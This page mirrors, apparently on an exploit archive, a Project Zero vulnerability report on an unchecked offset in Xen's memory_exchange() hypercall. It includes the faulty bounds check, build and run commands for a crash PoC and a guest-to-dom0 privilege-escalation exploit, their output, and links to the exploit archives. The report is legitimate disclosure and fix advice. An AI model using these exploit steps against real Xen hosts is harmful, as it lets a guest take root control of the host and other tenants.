扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 |
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184 This bug report describes a vulnerability in memory_exchange() that permits PV guest kernels to write to an arbitrary virtual address with hypervisor privileges. The vulnerability was introduced through a broken fix for CVE-2012-5513 / XSA-29. The fix for CVE-2012-5513 / XSA-29 introduced the following check in the memory_exchange() hypercall handler: if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) || !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) ) { rc = -EFAULT; goto fail_early; } guest_handle_okay() calls array_access_ok(), which calls access_ok(), which is implemented as follows: /* * Valid if in +ve half of 48-bit address space, or above * Xen-reserved area. * This is also valid for range checks (addr, addr+size). As long * as the start address is outside the Xen-reserved area then we * will access a non-canonical address (and thus fault) before * ever reaching VIRT_START. */ #define __addr_ok(addr) \ (((unsigned long)(addr) < (1UL<<47)) || \ ((unsigned long)(addr) >= HYPERVISOR_VIRT_END)) #define access_ok(addr, size) \ (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size)) As the comment states, access_ok() only checks the address, not the size, if the address points to guest memory, based on the assumption that any caller of access_ok() will access guest memory linearly, starting at the supplied address. Callers that want to access a subrange of the memory referenced by a guest handle are supposed to use guest_handle_subrange_okay(), which takes an additional start offset parameter, instead of guest_handle_okay(). memory_exchange() uses guest_handle_okay(), but only accesses the guest memory arrays referenced by exch.in.extent_start and exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset. The intent behind exch.nr_exchanged is that guests always set it to 0 and nonzero values are only set when a hypercall has to be restarted because of preemption, but this isn't enforced. Therefore, by invoking this hypercall with crafted arguments, it is possible to write to an arbitrary memory location that is encoded as exch.out.extent_start + 8 * exch.nr_exchanged where exch.out.extent_start points to guest memory and exch.nr_exchanged is an attacker-chosen 64-bit value. I have attached a proof of concept. This PoC demonstrates the issue by overwriting the first 8 bytes of the IDT entry for #PF, causing the next pagefault to doublefault. To run the PoC, unpack it in a normal 64-bit PV domain and run the following commands in the domain as root: root@pv-guest:~# cd crashpoc root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd) make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' LD/root/crashpoc/built-in.o CC [M]/root/crashpoc/module.o nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm LD [M]/root/crashpoc/test.o Building modules, stage 2. MODPOST 1 modules WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o CC/root/crashpoc/test.mod.o LD [M]/root/crashpoc/test.ko make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' root@pv-guest:~/crashpoc# insmod test.ko root@pv-guest:~/crashpoc# rmmod test The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4 (from Ubuntu 16.04.2). Executing the PoC caused the following console output: (XEN) *** DOUBLE FAULT *** (XEN) ----[ Xen-4.6.0x86_64debug=nTainted:C ]---- (XEN) CPU:0 (XEN) RIP:e033:[<0000557b46f56860>] 0000557b46f56860 (XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor (XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040 (XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0 (XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8:0000557b46f7df00 (XEN) r9:0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878 (XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0 (XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0 (XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93 (XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033 (XEN) (XEN) **************************************** (XEN) Panic on CPU 0: (XEN) DOUBLE FAULT -- system shutdown (XEN) **************************************** (XEN) (XEN) Reboot in five seconds... I strongly recommend changing the semantics of access_ok() so that it guarantees that any access to an address inside the specified range is valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of access_ok() and appropriate wrappers to prevent people from using these functions improperly. Currently, in my opinion, the function name access_ok() is misleading. Proof of Concept: xen_memory_exchange_crashpoc.tar ################################################################################ I have written an exploit (attached). Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump): root@pv-guest:~/privesc_poc# ./compile.sh make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' LD/root/privesc_poc/built-in.o CC [M]/root/privesc_poc/module.o nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm LD [M]/root/privesc_poc/test.o Building modules, stage 2. MODPOST 1 modules WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o CC/root/privesc_poc/test.mod.o LD [M]/root/privesc_poc/test.ko make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest' press enter to continue <press enter> root@pv-guest:~/privesc_poc# dmesg in the unprivileged PV guest: [721.413415] call_int_85 at 0xffffffffc0075a90 [721.420167] backstop_85_handler at 0xffffffffc0075a93 [722.801566] PML4 at ffff880002fe3000 [722.808216] PML4 entry: 0x13bba4067 [722.816161] ### trying to write crafted PUD entry... [722.824178] ### writing byte 0 [722.832193] write_byte_hyper(ffff88007a491008, 0x7) [722.840254] write_byte_hyper successful [722.848234] ### writing byte 1 [722.856170] write_byte_hyper(ffff88007a491009, 0x80) [722.864219] write_byte_hyper successful [722.872241] ### writing byte 2 [722.880215] write_byte_hyper(ffff88007a49100a, 0x35) [722.889014] write_byte_hyper successful [722.896232] ### writing byte 3 [722.904265] write_byte_hyper(ffff88007a49100b, 0x6) [722.912599] write_byte_hyper successful [722.920246] ### writing byte 4 [722.928270] write_byte_hyper(ffff88007a49100c, 0x0) [722.938554] write_byte_hyper successful [722.944231] ### writing byte 5 [722.952239] write_byte_hyper(ffff88007a49100d, 0x0) [722.961769] write_byte_hyper successful [722.968221] ### writing byte 6 [722.976219] write_byte_hyper(ffff88007a49100e, 0x0) [722.984319] write_byte_hyper successful [722.992233] ### writing byte 7 [723.000234] write_byte_hyper(ffff88007a49100f, 0x0) [723.008341] write_byte_hyper successful [723.016254] ### writing byte 8 [723.024357] write_byte_hyper(ffff88007a491010, 0x0) [723.032254] write_byte_hyper successful [723.040236] ### crafted PUD entry written [723.048199] dummy [723.056199] going to link PMD into target PUD [723.064238] linked PMD into target PUD [723.072206] going to unlink mapping via userspace PUD [723.080230] mapping unlink done [723.088251] copying HV and user shellcode... [723.096283] copied HV and user shellcode [723.104270] int 0x85 returned 0x7331 [723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800 [723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800 [723.128226] remapped IDT entry for 0x80 to 0xffff804000100800 [723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15 [723.144291] int 0x85 returned 0x1337 [723.152235] === END === The supplied shell command executes in dom0 (and all other 64bit PV domains): root@ubuntu:~# cat /tmp/owned_by_the_guest uid=0(root) gid=0(root) groups=0(root) root@ubuntu:~# Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor. I have tested the exploit in the following configurations: configuration 1: running inside VMware Workstation Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)" dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu configuration 2: running on a physical machine with Qubes OS 3.1 installed Xen version 4.6.3 Proof of Concept: privesc_poc.tar.gz ################################################################################ Proofs of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip |
体验盒子
